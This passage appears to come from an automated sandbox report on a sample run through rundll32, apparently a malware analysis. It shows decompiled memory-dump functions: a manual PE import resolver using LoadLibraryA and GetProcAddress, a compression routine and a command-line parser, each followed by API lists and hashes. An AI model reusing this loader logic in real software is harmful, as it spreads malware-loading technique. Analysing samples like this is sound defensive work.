0x04953c72
0x04953c7b
0x04953c7d
0x04953c83
0x04953cb2
0x04953cb2
0x04953cba
0x04953cbd
0x04953cbd
0x04953c85
0x04953c86
0x04953c8c
0x04953c8e
0x04953c8e
0x04953c93
0x04953c92
0x04953c92
0x04953c9a
0x04953ca6
0x04953cb0
0x04953cb0
0x00000000
0x04953c5c
0x04953c5c
0x04953c5c
0x04953c62
0x00000000
0x00000000
0x04953c64
0x04953c6a
0x04953c6f
0x00000000
0x04953c6f
0x04953c4c

APIs

_snprintf.MSVCRT ref: 04953C22
strchr.MSVCRT ref: 04953C42
strchr.MSVCRT ref: 04953C51
strchr.MSVCRT ref: 04953C76

Strings

%.*g, xrefs: 04953C19

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: strchr$_snprintf
String ID: %.*g
API String ID: 3619936089-952554281
Opcode ID: 096e2f23bf719e4d311d682c73e5a2bb93945815ad39b38c18f69218a1948f64
Instruction ID: 0a434c3e2f4fc1d4e1a05d58e0ba026dedb3c859586a2968ab87867384001522
Opcode Fuzzy Hash: 096e2f23bf719e4d311d682c73e5a2bb93945815ad39b38c18f69218a1948f64
Instruction Fuzzy Hash: 2A21273260065526E731DE68DC85FAB37AC9F417A8F394539FC45C62A0E7A0B96443D1

Uniqueness

Uniqueness Score: -1.00%

Function 04953D9F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E04953D9F(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E049493DC(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x04953d9f
0x04953da5
0x04953dad
0x04953dc2
0x04953dd4
0x04953de0
0x04953de6
0x04953deb
0x04953df7
0x04953f62
0x00000000
0x04953f62
0x04953dfd
0x04953e06
0x04953e14
0x04953e17
0x04953e26
0x04953e26
0x04953e2d
0x04953e3b
0x04953e3e
0x04953e4e
0x04953e5b
0x04953e62
0x04953e72
0x04953e84
0x04953e8a
0x04953e74
0x04953e7c
0x04953e7c
0x04953e8d
0x04953e91
0x04953e9d
0x04953ea1
0x04953ea5
0x04953ea9
0x04953eb5
0x04953ee0
0x04953ee8
0x04953eee
0x04953efa
0x04953f06
0x04953eb7
0x04953ebc
0x04953ec7
0x04953ed3
0x04953ed3
0x04953f0f
0x04953f15
0x04953f1f
0x04953f3b
0x04953f21
0x04953f24
0x04953f30
0x04953f30
0x04953f1f
0x04953f43
0x04953f4c
0x04953f4c
0x04953f5a
0x00000000
0x04953f5a
0x04953e66
0x00000000
0x04953e66
0x00000000
0x04953e3e
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 04953DBC
LoadLibraryA.KERNEL32(00000000), ref: 04953E55

Strings

GetProcAddress, xrefs: 04953DC5
kernel32.dll, xrefs: 04953DB7

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 7428f6727e5aa05bb5a7cedc9566573ce5ed36b17a41079d16b83db73ea7d66a
Instruction ID: 9c986b6540944e2436c3550910111cc6ea15f3267915421eee9b5dec08e7048c
Opcode Fuzzy Hash: 7428f6727e5aa05bb5a7cedc9566573ce5ed36b17a41079d16b83db73ea7d66a
Instruction Fuzzy Hash: 7461AD75E00209EFDB10CF98D485BADBBF1FF08355F2485A9E815AB2A1D334AA84DF54

Uniqueness

Uniqueness Score: -1.00%

Function 04954BF0 Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E04954BF0(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x40f8458b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x960fd8a1
					_t12 = _t272 + 0x5c; // 0x54e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E04957C10(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E04956970(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x54e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E04956AB0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x960fd8a1
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x960fd8a1
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x1488087d
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x960fd8a1
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x960fd8a1
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xff4d8a39
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x54e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x1488087d
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x960fd8a1
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E04956AB0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x960fd8a1
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x40f8458b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x54e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x54e85000
							E04957C10(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E04956970( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x54e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x04954bf6
0x04954bfb
0x04954bff
0x04954c02
0x04954c02
0x04954c05
0x04954c0a
0x04954c0f
0x04954c12
0x04954c17
0x04954c1a
0x04954c20
0x04954c20
0x04954c2b
0x04954c2e
0x04954c35
0x04954c3a
0x00000000
0x00000000
0x04954c40
0x04954c45
0x04954c45
0x04954c4a
0x04954c50
0x04954c5a
0x04954c5f
0x04954c65
0x04954c84
0x04954c87
0x04954c92
0x04954c92
0x04954c92
0x04954c89
0x04954c89
0x04954c8b
0x00000000
0x04954c8d
0x04954c8d
0x04954c8d
0x04954c8b
0x04954c9a
0x04954c9f
0x04954ca4
0x04954caa
0x04954cae
0x04954cb1
0x04954cb4
0x04954cba
0x04954cbf
0x04954cc2
0x04954cc8
0x04954ccd
0x04954cd3
0x04954cd9
0x04954cde
0x04954ce1
0x04954ce6
0x04954cea
0x04954cee
0x04954cf1
0x04954cf4
0x04954cfd
0x04954d04
0x04954d07
0x04954d0a
0x04954d0f
0x04954d14
0x04954d17
0x04954d1a
0x04954d1a
0x04954d1e
0x04954d27
0x04954d2e
0x04954d31
0x04954d36
0x04954d3b
0x04954d3b
0x04954d3e
0x04954d43
0x00000000
0x00000000
0x04954c67
0x04954c69
0x04954c76
0x00000000
0x00000000
0x04954c76
0x04954c69
0x00000000
0x04954c65
0x04954d49
0x04954d4e
0x04954d51
0x04954d54
0x04954dff
0x04954dff
0x04954d5a
0x04954d5a
0x04954d5a
0x04954d5f
0x04954d89
0x04954d8c
0x04954d8c
0x04954d91
0x04954d93
0x04954d95
0x04954d98
0x04954d9b
0x04954da3
0x04954da8
0x04954da8
0x04954dae
0x04954db1
0x04954db4
0x04954db7
0x04954db9
0x04954db9
0x04954dba
0x04954dba
0x04954db7
0x04954dc8
0x04954dcb
0x04954dcf
0x04954dd4
0x04954dd7
0x04954dda
0x04954dda
0x04954dda
0x04954ddd
0x04954ddd
0x04954de0
0x04954de0
0x04954d61
0x04954d61
0x04954d71
0x04954d74
0x04954d79
0x04954d79
0x04954d7c
0x04954d7f
0x04954d82
0x04954d84
0x04954d84
0x04954de3
0x04954de5
0x04954de8
0x04954de8
0x04954dee
0x04954df2
0x04954df5
0x04954df7
0x04954df7
0x04954e08
0x04954e0a
0x04954e0a
0x04954e12
0x04954e20
0x04954e23
0x04954e25
0x04954e45
0x04954e45
0x04954e48
0x04954e4e
0x04954e4f
0x04954e52
0x04954e54
0x04954e57
0x04954e5a
0x04954e5d
0x04954e61
0x04954e64
0x04954e67
0x04954e6a
0x04954e6c
0x04954e6c
0x04954e6f
0x04954e71
0x04954e71
0x04954e74
0x04954e76
0x04954e79
0x04954e81
0x04954e84
0x04954e89
0x04954e89
0x04954e8f
0x04954e92
0x04954e95
0x04954e97
0x04954e97
0x04954e98
0x04954e98
0x04954ea3
0x04954ea3
0x04954ea3
0x04954ea6
0x04954ea9
0x04954ea9
0x04954eac
0x04954eac
0x04954e6f
0x04954eaf
0x04954eb2
0x04954eb5
0x04954eb7
0x04954eba
0x04954ebc
0x04954ebf
0x04954ec2
0x04954ec4
0x04954ec7
0x04954ecf
0x04954ed7
0x04954eda
0x04954eda
0x04954eda
0x04954edd
0x04954edd
0x04954edd
0x04954ee0
0x04954ee6
0x04954ee8
0x04954ee8
0x04954eee
0x04954ef4
0x04954efd
0x04954f04
0x04954f06
0x04954f09
0x04954f09
0x04954f0c
0x04954f0c
0x04954f0f
0x04954f11
0x04954f14
0x04954f16
0x04954f31
0x04954f31
0x04954f35
0x04954f38
0x04954f3b
0x04954f3e
0x04954f54
0x04954f54
0x04954f54
0x04954f40
0x04954f40
0x04954f42
0x04954f46
0x04954f49
0x00000000
0x04954f4b
0x04954f4b
0x04954f4d
0x00000000
0x04954f4f
0x04954f4f
0x04954f4f
0x04954f4d
0x04954f49
0x04954f58
0x04954f5b
0x04954f60
0x04954f6a
0x04954f6a
0x04954f6a
0x04954f6d
0x04954f18
0x04954f18
0x04954f1a
0x04954f21
0x04954f21
0x04954f23
0x04954f25
0x04954f27
0x04954f2b
0x04954f2d
0x04954f2f
0x00000000
0x00000000
0x04954f2f
0x04954f2b
0x04954f1c
0x04954f1c
0x04954f1f
0x00000000
0x00000000
0x04954f1f
0x04954f1a
0x04954f77
0x04954f79
0x04954f79
0x04954f84
0x04954e27
0x04954e27
0x04954e2a
0x00000000
0x04954e2c
0x04954e2c
0x04954e2e
0x04954e32
0x00000000
0x04954e34
0x04954e34
0x04954e34
0x04954e37
0x00000000
0x04954e3b
0x04954e44
0x04954e44
0x04954e37
0x04954e32
0x04954e2a
0x04954e16
0x04954e1f
0x04954e1f

APIs

memcpy.MSVCRT ref: 04954CFD
memcpy.MSVCRT ref: 04954D74
memcpy.MSVCRT ref: 04954DA3
memcpy.MSVCRT ref: 04954DCF
memcpy.MSVCRT ref: 04954E84

Part of subcall function 04957C10: memcpy.MSVCRT ref: 04957CEE

Part of subcall function 04956970: memcpy.MSVCRT ref: 0495699A

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
Instruction ID: c508c99a67074788f19657723a9f742087c0c67ca3a272c4acb405c3f0786a2d
Opcode Fuzzy Hash: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
Instruction Fuzzy Hash: 73D10375600600AFDB64CF6DD9C4A6AB7E5FF88304B24897DE88ACB721D731F9848B54

Uniqueness

Uniqueness Score: -1.00%

Function 046B209B Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a75496f1efb5c191d428df92e40a50d38fb096c5dc734c531708c1a65280a27
Instruction ID: 6bf5f4feb100cd708656c96652e92a6bf95a02e9ba994d6458048b999b1193c1
Opcode Fuzzy Hash: 1a75496f1efb5c191d428df92e40a50d38fb096c5dc734c531708c1a65280a27
Instruction Fuzzy Hash: 5B316F35A10008ABDB24DAA4C8BCAFE7BF6AB55304F5441D9E7816B340F2317AC2D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0494B947 Relevance: 6.1, APIs: 4, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0494B947(intOrPtr __ecx) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				short* _v140;
				intOrPtr _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t52;
				signed int _t54;
				short* _t55;
				void* _t56;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t54 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t52 =  *(_t28 + _t41 * 4);
					_t30 =  *_t52 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
						_t40 = lstrlenW(_t52);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t54 = _t54 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t52[_t45] == 0x2c) {
								_t52[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t54 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t55 = _v140;
					L17:
					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
						E0494C145(_v16, _t55, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t55);
						_push("\\");
						_v12 = E04949924( &_v664);
						E0494C145(_v16, _t36, 0x104);
						E0494913B( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t55 = _v144;
				goto L17;
			}

0x0494b950
0x0494b957
0x0494b95a
0x0494b967
0x0494b96d
0x0494b970
0x0494b972
0x0494b977
0x0494ba4e
0x0494ba4e
0x0494ba4e
0x00000000
0x00000000
0x00000000
0x00000000
0x0494b97d
0x0494b97d
0x0494b97d
0x0494b980
0x0494b986
0x0494b9a2
0x0494b9a9
0x0494b9af
0x0494b9b3
0x0494b9c7
0x0494b9c7
0x0494b9ca
0x00000000
0x00000000
0x00000000
0x00000000
0x0494b9b5
0x0494b9b5
0x0494b9ba
0x0494b9be
0x0494b9be
0x0494b9c2
0x0494b9c3
0x00000000
0x0494b9b5
0x0494b9cb
0x0494b9cb
0x0494b9ce
0x0494b9cf
0x0494b9d6
0x0494b9e0
0x00000000
0x00000000
0x0494b9e2
0x0494b9e8
0x0494b9ec
0x0494ba44
0x0494b9f5
0x0494ba02
0x0494ba08
0x0494ba0a
0x0494ba11
0x0494ba22
0x0494ba25
0x0494ba30
0x0494ba35
0x00000000
0x0494ba4a
0x0494b9d8
0x00000000

APIs

GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 0494B95C
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0494B967
lstrlenW.KERNEL32(00000000), ref: 0494B9A9
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0494BA02

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

